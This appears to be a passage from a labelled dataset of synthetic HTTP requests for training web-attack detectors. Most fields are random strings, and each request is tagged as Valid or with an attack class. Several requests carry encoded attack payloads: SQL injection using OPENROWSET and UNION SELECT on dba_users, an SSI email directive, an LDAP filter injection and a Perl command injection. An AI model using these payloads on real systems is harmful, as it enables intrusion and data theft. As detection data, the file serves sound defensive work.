Proxy-Authorization: NTLM bm85dHN0bmV3b3Z5YWF5dmxydEVmcGkxZG1nZWNuZWNyaA==
Authorization: Digest algorithm=MD5
Range: 78-,-3271
Referer: http://htHBt.it/5mdeuu/62rsseo.php3
TE: trailers,trailers
Trailer: Trailer
User-Agent: nz1lwU
UA-CPU: Sparc
UA-OS: Linux
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: lmir; sAKlmfa=tebiaI
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Forwarded-For: 18.167.213.252
X-Serial-Number: 374979699289100440
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

usmsm26enobO=552910&sItlg= ni4lg &Degs5h=aie6setif3hceek&lOyNw=69060513&wcxevfs=66454575&X1m-L=m1n86aN0vjtae|a&izdoez5s9fo=28332&ixgTeXodolstsn=6&A3Casaitwerst=g0aS_&et1adymerid=hkalwbjilqlr

End - Id: 46000
Start - Id: 4216
class: Valid
PUT /ihNE3ftouazrtnte/Emz/d5cf23s9B30suscto/q0NAMsJm3fAt/lV3SylS4Bo7v_PT1yO/uiboitistamoO6prj/m7HwC.tiff? HTTP/1.1
Content-Length: 17
Content-Language: nrstladb,ulynr,bhnqhsdd
Content-Encoding: compress
Content-Location: http://www.t1oadl.de/kryta7i/uee2Ortr.nsf
Content-MD5: bnlkOHRhcmxyY2F0ZHlPbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Jul 05 01:23:03 GMT
Last-Modified: Thu, 25 Aug 05 13:55:07 CET
Host: 203.158.160.67:80
Connection: Rste39n
Accept: image/*;q=0.1
Accept-Charset: iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 39.254.93.91
Cookie: sxjpnib4=6FiA-4Fn
Cookie2: $Version="9"
Date: Tue, 30 Aug 05 24:54:58 GMT
ETag: W/"0CKOErj9WCvCxkr-"
Expect: 100-continue
From: hjihe3k@naahlyi3u2.ch
If-Modified-Since: Mon, 15 Aug 05 08:10:43 CET
If-Unmodified-Since: Thu, 27 Dec 07 19:40:27 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Oct 08 21:34:46 CET
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic eHNvaXAyRUw6cnNyb3o=
Authorization: Basic c2hldGV5ZWw6RW51dU1hTDY=
Range: 2-,878-,561480-5
Referer: http://www.sflttti.cz/haeamOnb/fsabnoY.jpeg
TE: deflate;q=0.0,trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (X11; U; Open BSD i586 5.3; ak-nU; rv:5.4.0) Gecko/12358066
UA-CPU: x86
UA-Disp: 030,366,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2347x8013
Via: 9.5 www.zanihi.js, FTP/2.5 51.125.203.131
Transfer-Encoding: deflate
Upgrade: geNeoa/6.8
Warning: 425 57.79.59.191 "eLiEpselaaO8e" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 1489164052019432947
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

helvfwws=frZa0SUA

End - Id: 4216
Start - Id: 42549
class: SqlInjection
GET /nqenyOs7tnltt/eG1Dt11f-YZCHE6I/n6jyRKJc9/bHGSVH4AP5mBRO4C/at4asaonliab9pytnnna/fZ5e6cQY@yA/aMwqUpMNkpdsYD3S/rTXij-sC6VKmyw/gerctt2yueEmo3ng/jSO/8QfHnqk7yS0-.shtml?3bx=%3B++select+++*++++from+OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3Ddhulrs0or%3Bpwd%3Dnt%3BNetwork%3DDBMSSOCN%3BAddress%3D57.185.216.254%2C70100%3B%27%2C%27select+++*+++++from+++++Ltbw%27%29&Lbea7Top9eiajti=9488130791&rbnl=422789937&iotue=a&dvhoeoewm9nnwdO=0%3Br%7Cshesechoy&efig2xic=NotypLIS9Dg&dndi9=psoP2%40&Ii=lar2orvbscriptw&uAj=4488436 HTTP/1.0
Host: 66.34.185.254
Connection: close
Accept: image/png;q=0.2, video/mpeg;q=0.4, video/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.7, identity, deflate;q=0.6, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 63.14.152.225
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Fri, 25 Apr 08 20:59:41 CET
ETag: W/"LEVaDfsyAKfrIXNnW"
Expect: 100-continue
From: ecsnelg0@jkwTHolpio.fr
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Mar 07 13:09:18 UTC
Max-Forwards: 6848
MIME-Version: 3.7
Pragma: lremsDh=xZa
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: http://www.thtaw9.net/9iiLsp/cibi7wf/oiddr.mspx
TE: trailers,gzip;q=0.8
Trailer: Via
User-Agent: uHlZkS_jrQ http://www.Snlf.gov
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: FTP/7.9 www.dixqn.html:5, 7.7 www.etr8ienn.htm
Transfer-Encoding: gzip
Upgrade: aehy/9.2, etyl/6.6
Warning: 087 94.225.210.152:5070 "hd1enneoq" 
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42549
Start - Id: 18241
class: Valid
GET /ey./aULlPjtz.Bh5432W9U48.jsp?fdzconTDOeif=01943436&rsi4ihyilt=dYnee7yv77ie&se1oEsthr=ft%3Eso4tbk&fiinio=sd+%5Cscud1%5BO6r1bi&sikanio7tscaL=172O&enlll=yehs%29iframey6%3Bjntelnetconnect&hUcatraccess_logId26Dl7=8eNlAVJK12&R7ge8hrahnrdt=etvgroup+bynocxaid&Otras8edraw=d60QZogpim_z&pbnrhnryy0l=3&TKiURmhttp2q=sdfeoyocvtdOe HTTP/1.1
Host: www.Isnhntoh.st:224
Connection: pyRso
Accept: */*
Accept-Charset: iso-8859-5, us-ascii;q=0.5, windows-1253;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: gnnnde=nmtk
Client-ip: 12.11.189.0
Cookie: it=bmochagiolibbeltHhudp;2ct@metaaHwinntbgsound=wde1nebodyjunionro;afdtE2=:sacdu;inputxml8RxKupdateD9=llvWyt6vhe;feKeauemL=o kee
Cookie2: $Version="362"
Date: Sun, 10 Oct 04 03:12:03 CET
ETag: W/"_nMYwh1.95W4WOl"
Expect: o29hinWi=snxpo
From: anwits@qdrec.org
If-Modified-Since: Sat, 03 Jan 09 14:14:09 CET
If-Unmodified-Since: Tue, 12 Sep 06 10:40:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Apr 09 18:19:45 UTC
Max-Forwards: 2248
MIME-Version: 0.2
Pragma: r='aLwkoett'
Proxy-Authorization: Basic dGV0OGVkazp0aW9scQ==
Authorization: sns8 gludebh=iATsy
Range: 41-16
Referer: http://www.E627na.it/rsg3es/yezq/adceep/ieeCt.php
TE: trailers,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 4.9; eD-ni; rv:5.8.7) Gecko/05940694
UA-CPU: PowerPC
UA-Disp: 713,1321,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1021x3555
Via: FTP/6.5 166.56.42.121, HTTP/6.0 www.hcmonpkG.htm:4, 8.7 191.101.155.247:47616
Transfer-Encoding: gzip
Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 27.26.79.206
X-Serial-Number: 296173
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18241
Start - Id: 42496
class: SqlInjection
GET /rsA2vwnLneoirneslN/wkJuOti7/systemY1Tegaa8/eCicrQWIQveAq.zKz/lgii1tOtnscGTgjz0hn8/itUniGGp7TxigLeTF/eDxlgAgXe.png?sc=hote&3eEdticIClture=9669152&XCTaceGeL=OR++++%27ens%27++IN++++%28+++%27+++%27++++%29&wgetformnZ=r-0TM5 HTTP/1.0
Host: www.sar28x.fr
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312, hz-gb-2312, iso-8859-15;q=0.9, windows-1251;q=0.2, big5;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=6210
Client-ip: 160.117.251.89
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="45"
Date: Tue, 12 Feb 08 10:23:25 UTC
ETag: W/"R_iyxOFyTu-4qGue"
Expect: en3i=hrestiae;eenei5es
From: sheo@RafNi.uk
If-Modified-Since: Tue, 19 Jan 10 05:43:11 CET
If-Unmodified-Since: Fri, 20 Jun 08 08:02:42 GMT
If-Match: *
If-None-Match: "bH5@VpIcSk61rbQS"
If-Range: Sun, 12 Jun 05 01:03:43 GMT
Max-Forwards: 13
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: utooek cAhe=prlkCm
Range: 7-59040
Referer: /sttcx/ertaeaw.mdb
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: cYIcS1drpd (oNIbgcW9N; cNeAF-P5x; ewaUjOWI; c2uruad; pOJ_N5Pw)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.0 www.zumt.gif, FTP/2.8 www.lenU4t9o.htm
Transfer-Encoding: beonz
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42496
Start - Id: 4258
class: Valid
POST /r17fdropqHTjNFE.ls/tah/xsNt5taauqitiuxtweh/nkibtoosra4gleobnm/nqea/fh.mdb? HTTP/1.1
Content-Length: 178
Content-Language: alrl
Content-Encoding: compress
Content-Location: /iOnbdea.shtml
Content-MD5: bG5hYXJoeHNzcmtvbjB1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Apr 08 07:06:35 UTC
Last-Modified: Mon, 16 Nov 09 19:22:22 CET
Host: www.eu8n.st
Connection: f7oAizet
Accept: */*;q=0.1
Accept-Charset: cp-950;q=0.2, x-mac-turkish;q=0.0, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 113.87.214.25
Cookie: ek=tdAYZAEM9;Teb7atc=emdhynetopen
Cookie2: $Version="11"
Date: Sat, 27 Feb 10 04:26:02 UTC
ETag: "FZaQFhCBRmUNO@lzenU"
Expect: ooamse=aiiOI
From: sblb@seuhwa.net
If-Modified-Since: Fri, 04 Aug 06 14:56:40 UTC
If-Unmodified-Since: Mon, 24 Nov 08 22:38:46 GMT
If-Match: "jdQHBW4Ok-Vm0fi"
If-None-Match: *
If-Range: *
Max-Forwards: 7197
MIME-Version: 7.5
Pragma: w8irmua='zweSGht'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: lDmi 2tRol=Iscsha
Range: 1-35021,-9128
Referer: /Idgs/e0nmnltn/arfeeoe.css
TE: deflate,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: ct7ii31rzT/9.1.5.0.4
UA-CPU: StrongARM
UA-Disp: 4721,826,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 193x5257
Via: FTP/4.1 www.utSm.gif:7171, YnEnlr/1.3 www.rxsaoos.shtml, 7.6 www.tuo83a.jpg:04
Transfer-Encoding: deflate
Upgrade: elldh/2.3, hhMe/5.9
Warning: 506 www.tlcm.tiff "GNPpw" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 62285156998436291420
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oacelQwirahiAtm=x6@erh3neToa-t'&bepositionH=xndk8ltenee2t&gsgeobonshtea=ptEl&aewixs=l&gazOaieyeipw=5&nfietslsa=n]s&iPEEK5j=ttd3aLh  epsoa&hSrth2er9tbfmo=hVWo&aa9idtlnaJn=on

End - Id: 4258
Start - Id: 39387
class: SSI
GET /hFOn/q0.css?aLlkEzh1ne0=9339&ee=%3C%21--%23email+fromhost%3D%22www.efosrhi.com%22+tohost%3D%22mailbox.dsui.com%22+message%3D%22Sehjm+aaeCsAp+dpneo+dyt%22+fromaddress%3D%22ttie.com%22+toaddress%3D%22rpI.tmn.com%22+subject%3D%22z0%22+sender%3D%22Icsm.com%22+replyto%3D%22rehre1.com%22+cc%3D%225oes%22+inreplyto%3D%22dxni+hEev+ofe2%22+id%3D%226rmail%22+--%3E&_LwieGunion=RpdrhtnncdeHW&8nkbeiyaibT9nn=7&htariie0t=%3Fsepl&enOnzorneoe=350236915&rane=tp&ea85d8img=ciaboavo&Shekl=eat HTTP/1.1
Host: www.eyrte.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eueeu-hr;q=0.7, hgs-tmswSb;q=0.0
Cache-Control: no-store
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="826"
Date: Wed, 24 Aug 05 03:09:40 GMT
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: lece@srdgy.org
If-Modified-Since: Wed, 27 Sep 06 10:07:28 UTC
If-Unmodified-Since: Mon, 17 Sep 07 08:57:05 GMT
If-Match: "xWyF-Pl0UI.2DDe.dJz"
If-None-Match: "xl8bKCmo03Vjf4_s1K"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 257
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXg1ZWE0aEl3dzVpaW5FdG9icHdlZWRuU29oYW1hZDg=
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://www.tpetle72.com/5ddNtsaT/tEsoie/ilgs/npn3/Sthplo.jsp
TE: gzip,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 8.9; p0-rm; rv:0.6.9) Gecko/59600833
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 9.9 www.zoeti.png, HTTP/1.1 www.n57NNyoT.jpg
Transfer-Encoding: gzip
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39387
Start - Id: 20370
class: Valid
GET /tc/r1/eTfoqB/mjoenIh8wf.cgi?f6P1jtkiexoOrss=Uq3tgc6&ktrdhuozuiud=eQtc&furUus=nza5xxN&ohzyw=6807&teuejNdLsHvcseI=35299&fma=An5%5DI%7En9unionmrey%3C&.4Kgwinnt=aYhsE&e3=weiIa&nI=thrtmpd&Kall_echovftp=23&eehh=a%2Fe&edehfa9n4rea=+oeinsnahbceo+dr&Aidw=m&iiaodudeaNtdyaf=99682 HTTP/1.1
Host: 180.111.167.130
Connection: close
Accept: image/*;q=0.3, audio/*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.2, iso-8859-5, windows-1250;q=0.0, ks_c_5601-1987, utf-8
Accept-Encoding: identity;q=0.5, gzip;q=0.5, identity
Accept-Language: *;q=0.4
Cache-Control: max-stale=39
Client-ip: 154.221.244.163
Cookie: anese0d7m=446;458a0Ujz=]qxaF
Cookie2: $Version="19"
Date: Mon, 13 Dec 04 09:37:40 UTC
ETag: "YXxs7h-s8UqG4YDka"
Expect: yg4us1u=IoeT
From: ueaw@nsel.fr
If-Modified-Since: Mon, 01 Nov 04 07:39:37 UTC
If-Unmodified-Since: Sun, 18 Dec 05 10:20:18 GMT
If-Match: "R3BAtLctNgxyerZtI"
If-None-Match: "M6kKZku20UEq-9.vzwxj"
If-Range: Sat, 10 Oct 09 23:44:55 UTC
Max-Forwards: 7297
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Digest response="76B286BBED7CdDA1db8b81Bc2ff20830"
Range: -9710,4363-45984
Referer: http://ms4biegb.net/bs871/4siialh/tstTCm.mpeg
TE: trailers
Trailer: From
User-Agent: Mozilla/9.4 (X11; U; Linux i586 0.7; jd-Be; rv:4.3.3) Gecko/91256569
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: tlNec/2.4 www.iirsmSe.jpeg, uyin/3.1 33.43.28.31:2, 9.5 102.182.126.157:8513
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 591 25.163.162.46 "crRlttnfy34yatEthsd" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20370
Start - Id: 38103
class: LdapInjection
GET /vamnRdrt8/jtO15e8ta/JNRvwJ/e@0O9C@zzuwU.gif?bhooge=ifrom2rjnWd9&eaOhe08e=978624&iti7diytr6=duteisei+-na+ueyie&EB=auQ5U&inqNbKoeb=guhplsmripgex&8iseO=aN3otA7R&iihEsluinram9on=226&oernloe=%29++++%28++++%7C++++%28displayName%3Dhad*%29++++%28name++++%3D+had*++++%29%28mail%3Dhad*++++%29&ue=47637&oniwhafrntg=dav&bp=wSrrE+i4rveaxmlee&olokut6fEotdp=ossitos%3F%3Cs%40execxd0d&IhrX6rlaecwRao=59702586&6k0i=71139&ej=inrlwlinkoe HTTP/1.1
Host: www.dseI1l.gov
Connection: EVyteg
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: co-esperuW, uigibv-srngan9;q=0.2, eZ0eh-deeeqet;q=0.2, u-i
Cache-Control: only-if-cached
Client-ip: 145.18.109.252
Cookie: FNWlykX%ue=621;it4boyScaq=e%40E;cseerasaetrdyah=r+aeammochaxp_+L
Cookie2: $Version="405"
Date: Thu, 07 Jul 05 16:28:36 UTC
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 27 Sep 07 06:45:11 GMT
If-Unmodified-Since: Sat, 06 Nov 04 13:37:48 GMT
If-Match: "JvAHjhs7llrfwX9."
If-None-Match: *
If-Range: *
Max-Forwards: 15
MIME-Version: 1.3
Pragma: lI2w=homy5tEh
Proxy-Authorization: Ounls db5m=ee3eth
Authorization: lnir4s xtmi5=esil
Range: -26705,8389-9530,6-32
Referer: /ntdtet/rrn6/s2neoo/AatarsU.js
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: Mozilla/5.7 (Windows; U; Windows NT 3.7; es-hh; rv:7.7.5) Gecko/60850214
UA-CPU: 68000
UA-Disp: 299,6993,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: s8aa/8.6, yeyo7a/9.5
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 164.220.220.166
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38103
Start - Id: 42624
class: SqlInjection
GET /9kXhm6J/netcatMN3u7sDkI/rOSki5roazk6j-PWvG/tQlzPc15t-u/eititersNqiw/ljtZTd3GI0y/hemnria7sn/divKO.tiff?apR=rfi0locationHO+rwalluoeit&XtqVhlOCU=nlulnnrosf5crt&hyenlace=4826201223&aon=8820022976&RJqyvD=chairs%27+UNION++SELECT+++++a+FROM++++dba_users++WHERE+name+++++like++++%27%2525&nilttmab9f=lvacceptFwtAahn&eheLo1=eW2vjxBC.E&hoqujn=dqhoo&nnmxenl=Voheerspolobjectefe&r0eoh=176 HTTP/1.1
Host: www.8aseeEy8yb.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: e-pmloionl, siem-uio;q=0.5
Cache-Control: no-store
Client-ip: 124.196.83.104
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Sat, 01 May 04 12:35:13 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sat, 05 Apr 08 24:45:00 CET
If-Unmodified-Since: Thu, 19 Oct 06 22:39:36 GMT
If-Match: *
If-None-Match: *
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 33
MIME-Version: 1.2
Pragma: nx='q'
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: 1wlss grhl=0tlt
Range: 72326-9838
Referer: /u9th0g/zcnt.cfm
TE: deflate;q=0.6,chunked;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/0.1 (X11; U; Linux i586 2.8; ic-n3; rv:8.2.6) Gecko/38546766
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: identity
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42624
Start - Id: 32417
class: Valid
GET /kZ/cHxobuJs_Nh_sE2Myfe/sAKG8uIL1/usGEna6k.4P/tDzF/aOOPfgjO/219@J4Lv99yqyj_d/tx7GeCecgCBR2fNt.mspx?brs8r=%2Fg+rh8usr3&eddprfgaekneak=a%24isvr2logy9slsj7waccess_log&DDyQ5O57_=w6%24%3Coiw4mls HTTP/1.0
Host: 220.164.55.192:77
Connection: keep-alive
Accept: application/rtf
Accept-Charset: x-mac-korean
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 183.35.15.71
Cookie: c03=44500;tmNslt2cu4tth=hdwerosnerN;thieiRadr0heOl=etnajs&ll]c;snl=pthijicnvrgcreE9s;io3hIa=6 tl1xisofa uae;xscoz=hm
Cookie2: $Version="1"
Date: Sun, 29 Feb 04 21:27:42 GMT
ETag: "oB4UAP3aCLriMMU2m"
Expect: 6mBomo
From: releg@syoCrleekk.net
If-Modified-Since: Wed, 22 Sep 04 08:20:55 CET
If-Unmodified-Since: Fri, 20 Aug 04 01:58:20 GMT
If-Match: "b7fL1kueKBmeR56L"
If-None-Match: "F6OaPjtobeS7YLIey"
If-Range: "UoLBQ7pQHOe-avob3sgn"
Max-Forwards: 9780
MIME-Version: 9.4
Pragma: UPzntd=a90g
Proxy-Authorization: riast tqseqm6g=ayomhio
Authorization: NTLM Y3l3ZWN6Z25iZTRhaXJpZWh3U241bE9pYVllcmF2YWMxbg==
Range: -9,-9053,093-28
Referer: /tsOji/nsaceA/lRe2et.gif
TE: deflate,gzip;q=0.8
Trailer: If-Match
User-Agent: mIcswooa/8.1.5.7.5
UA-CPU: MIPS
UA-Disp: 7145,6642,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: rot/3.0 www.rhnuRw.htm, 6.2 www.hluyx.jpg
Transfer-Encoding: compress
Upgrade: wrt/4.4
Warning: 286 www.NaiYvg3.css:98360 "iondiidelgzicr0rouen" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 32097
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32417
Start - Id: 21105
class: Valid
GET /rtfpre8iw/DbQbXghWG-.bin?o2ioihMh=32273&PcYykAOwgetu=HGNotcrMU%3Chieq&2bn=H HTTP/1.0
Host: 4.218.207.115:80
Connection: etee
Accept: video/*
Accept-Charset: x-mac-arabic;q=0.4, x-mac-chinesetrad
Accept-Encoding: compress;q=0.1, deflate, gzip, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 42.92.167.68
Cookie: ou3gt=Ilogyaselect
Cookie2: $Version="9"
Date: Sat, 27 Aug 05 10:33:49 UTC
ETag: "bEGyFS.RFNQ4ovS471"
Expect: hepthn
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Tue, 09 Mar 04 11:20:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 440
MIME-Version: 9.2
Pragma: a=d
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 5-42623,-8621
Referer: http://www.aeoB1ps.cz/ititj.cgi
TE: gzip;q=0.5,chunked,chunked
Trailer: Via
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 3.5; 1o-Ne; rv:3.9.2) Gecko/53704043
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.5 56.51.254.48
Transfer-Encoding: identity
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 183 155.105.82.2 "rsureli4" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 0274722
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21105
Start - Id: 36767
class: OsCommanding
GET /tssA0om3roWoj6soI/gnzomwsNmhnio2meaqh/R8e1luiSeri3/eR/iYKrvp-T7Vm3VeoIx.shtml?pnejuafetl0Th=6&NrxenINn=384796&9ahT=%25uswhere%3E&ilettHIgiih=httradebetweenav&nhhaeparzdguife=r&xoOiinoOrho=cunehl&EM9-T=46&bV7aq16moxhae=sezr7eMnB&cORv9aA=j.54H-&soaeeoHct1asiAN=ydeeowts0d4&ehnai0Rheeuz=l3qS_-BE&CVc6J=%2Fperl+%2Ftmp%2Falns.pl++++-p2689&LFITADDP1j=e4Bew&Jh2fS=updategsct2Ia++%27wscriptohomeedinsertr HTTP/1.0
Host: www.vqaalioptn.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: fepphe2=4Epasu
Client-ip: 175.79.197.116
Cookie: serhEin1oieS=txpkiY6ht;sT6f3aniaanxAcm=Uxeuedaa9uZdtcYes;replace@echoD=hmpFtzrUgtt4uDqii;9xniowccht=]thttp|gtsUFht&?Z
Cookie2: $Version="22"
Date: Wed, 15 Jul 09 24:30:54 GMT
ETag: "bG0iOuAbRP_eNEv"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Fri, 09 Apr 04 23:57:10 GMT
If-Unmodified-Since: Fri, 30 Nov 07 05:34:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Sep 07 06:12:25 CET
Max-Forwards: 505
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: Basic b25lTG5uOmFnYXNOY2g=
Range: 8-,6-50
Referer: /sceMi7r/m3rb.js
TE: trailers,trailers
Trailer: If-Range
User-Agent: fgie/7.9.7
UA-CPU: 68000
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36767
Start - Id: 16784
class: Valid
GET /tFezcol1/2@VtnodeWo/eN_Kpn@zS8/8y_ZwcFRN2Gn4I/mtuob/dqBxjhWZIYWBYaXtX@/lI7uTXiN9nMFxml/owilss7ynEce/vAborlYsB0@iFI4OU.gif? HTTP/1.1
